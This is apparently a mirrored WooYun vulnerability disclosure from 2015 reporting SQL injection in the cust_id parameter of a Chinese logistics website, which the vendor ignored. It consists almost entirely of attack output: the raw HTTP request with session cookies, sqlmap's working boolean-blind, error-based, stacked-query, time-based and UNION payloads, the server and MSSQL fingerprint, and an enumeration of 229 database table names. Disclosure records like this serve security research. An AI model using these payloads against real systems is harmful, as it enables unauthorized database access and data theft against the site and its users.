乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-11: 细节已通知厂商并且等待厂商处理中 2015-11-24: 厂商已经主动忽略漏洞,细节向公众公开
POST /Ashx/GetWshi.ashx?companyName=%25u4E91%25u5357%25u6B63%25u901A%25u5FB7%25u4FE1%25u8D27%25u8FD0%25u6709%25u9650%25u516C%25u53F8&cust_id=1072364&pid=1&wshiCity=%25u4E91%25u5357%25u7701%25u6606%25u660E%25u5E02 HTTP/1.1Content-Length: 485Content-Type: application/x-www-form-urlencodedCookie: ASP.NET_SessionId=xmz5ifblol3dv4qgymnrpd00; TemGold_1072364=1,14,4,3,5,6,11,12,10,13; TemFormat_1072364=lsrb; BAIDUID=8E474BC330333966DD7B0C2263535823:FG=1; Hm_lvt_b056f6db54a055cf5bfde997b9ed913f=1447121410,1447121416,1447121458,1447121708; Hm_lpvt_b056f6db54a055cf5bfde997b9ed913f=1447121708; Hm_lvt_d653978debccea19667b401ab77ac0ad=1447121410,1447121416,1447121458,1447121708; Hm_lpvt_d653978debccea19667b401ab77ac0ad=1447121708; HMACCOUNT=A63704B16C8F6603Host: ynztwl.chinawutong.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*companyName=%25u4E91%25u5357%25u6B63%25u901A%25u5FB7%25u4FE1%25u8D27%25u8FD0%25u6709%25u9650%25u516C%25u53F8&cust_id=123&kind=%25u914D%25u8D27%25u4FE1%25u606F%25u90E8&pid=1&random=0.7215899890288711&toCity=%25u94DC%25u5DDD%25u5E02&toPro=%25u9655%25u897F%25u7701&wshiCity=%25u4E91%25u5357%25u7701%25u6606%25u660E%25u5E02
sqlmap resumed the following injection point(s) from stored session:---Parameter: cust_id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123 AND 8050=8050&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123 AND 4256=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4256=4256) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113)))&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02 Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=(SELECT CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (1280=1280) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113))&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123;WAITFOR DELAY '0:0:5'--&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123 WAITFOR DELAY '0:0:5'&kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02 Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: companyName=%u4E91%u5357%u6B63%u901A%u5FB7%u4FE1%u8D27%u8FD0%u6709%u9650%u516C%u53F8&cust_id=123 UNION ALL SELECT NULL,CHAR(113)+CHAR(118)+CHAR(98)+CHAR(112)+CHAR(113)+CHAR(104)+CHAR(109)+CHAR(84)+CHAR(87)+CHAR(97)+CHAR(101)+CHAR(66)+CHAR(101)+CHAR(90)+CHAR(97)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &kind=%u914D%u8D27%u4FE1%u606F%u90E8&pid=1&random=0.7215899890288711&toCity=%u94DC%u5DDD%u5E02&toPro=%u9655%u897F%u7701&wshiCity=%u4E91%u5357%u7701%u6606%u660E%u5E02---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2008Database: Wutong[229 tables]+----------------------------------------+| AIRPORT || Admin || Appraise || BlackList || CARRIER || CW_Device || CarLineUrl || Cert_Car || ChengYunOrder || ClickLog || CoPicture || Collect_Car || Collect_Car || Coupons || CustLink || CustLocation || DiaoCha || DomainList || EmailTriggerRecord || Emails || GY_CharityCom || GY_EmergencyContact || GY_EmergencyGoods || GY_contribute || GY_help || GY_safety || GY_searchPerson || GjHuo || Gonggao || GoodsDetail || GpsAuthorization || GpsInfo || HRAbility || HRCoverLetter || HREducation || HRExperience || HRFavJob || HRFavSeeker || HRJobCityPK || HRJobs || HRPostSeekerPK || HRSeekerCompayPK || HRSeekerCompayPK || HRTrain || HighlyRecommend || HotmainLine || IDcardCheck || IMEI || ImgLocation || InterAir || InterAirReq || InterLine || InterShipping || InterShippingReq || LISTAreas || LP_AD || LP_AutoRepair || LP_Bath || LP_CarPark || LP_Catering || LP_Culture || LP_Hotel || LP_HouseRent || LP_LogisticsCom || LP_Merchants || LP_News || LP_NewsType || LP_Show || LP_TemplateAD || LP_WearHouse || LoginRecord || LongSourceHY || LongSourceHY || MSpeer_conflictdetectionconfigrequest || MSpeer_conflictdetectionconfigresponse || MSpeer_lsns || MSpeer_originatorid_history || MSpeer_request || MSpeer_response || MSpeer_topologyrequest || MSpeer_topologyresponse || MSpub_identity_range || MailTemp || MemberLogin || ModelKey || Nations || NewsCata || NewsCata || NewsClass || NewsData || OwnerContract || OwnersInsurance || PageNum || PayLog || Picture_Licence || Product || RankOne || RankTwo || Refuse_Collect || ReturnPwd || SEAPORT || SMT_ypxxone || SMT_ypxxtwo || SendEmailRecord || ServiceRecord || SourceRecord || Temp || TenderDocument || TextLocation || TopContacts || TopGoods || TuiSong || Url_Gj || Url_Query || UserGPS || VI_CarLine || VI_SpecialLinePH || VI_SpecialLinePH || VI_Wshi || Vi_Company || Vi_HRApplySeeker || VoicWshi || WapLog || WebBlackUser || WebLink || WebLog || WliuZbiao || adminrizhi || androidImg || android_Activities || android_Products || android_Recommend || banjia || bshi || bumen || bx_CusInsureInfo || bx_ParamsInsureInfo || bx_categories || bx_conveyances || bx_packages || bx_plan || bx_points || bx_xyzBackContent || caiwu || cheLine || chezhu || china_ad || com || config || daili || dtproperties || goq_Company || gpsUserInfo || huiyuan || huoOld || huo_order || huo_order || huo_print || huodong_order || infomationAppraise || jiameng_order || jianli || jop || keshi || ksheng || kshi || kuaijian || link || message || pay_information || powerUnit || push_CustomerTempThemes || push_CustomerTopic || push_QuartzTable || push_Themes || push_autoPublish || push_roborder || qiyeView || qiyepic || qiyepic || renzheng_geren || renzheng_qiye || rolePower || sqlmapoutput || syncobj_0x3032423438383034 || syncobj_0x3439373531363345 || syncobj_0x3531423844353443 || syncobj_0x3630373132373946 || syncobj_0x3637443233313437 || syncobj_0x3739364335463539 || syncobj_0x3846364531304330 || syncobj_0x3846423930423839 || syncobj_0x3934324143354645 || syncobj_0x3938453936374632 || syncobj_0x4434363133443337 || syncobj_0x4438333843394444 || syncobj_0x4633453042374444 || sysarticlecolumns || sysarticles || sysarticleupdates || sysdiagrams || sysextendedarticlesview || syspublications || sysreplservers || sysschemaarticles || syssubscriptions || systranschemas || tb_BuyInfor || tb_OneLeve || tb_SupplyInfor || tb_TwoLeve || tc_car || tem_userset || userPower || view_Prize || wsheng || wshiLinShi || wshiLinShi || wshiMainlineLinShi || wshiMainline_Price || wshiMainline_Price || wshiOrder || wxt_dd || yanzheng_jiashi || yanzheng_xingshi || ygrizhi || yuangong || zhaoshang || zhengshu |+----------------------------------------+
危害等级:无影响厂商忽略
忽略时间:2015-11-24 07:14
漏洞Rank:4 (WooYun评价)
暂无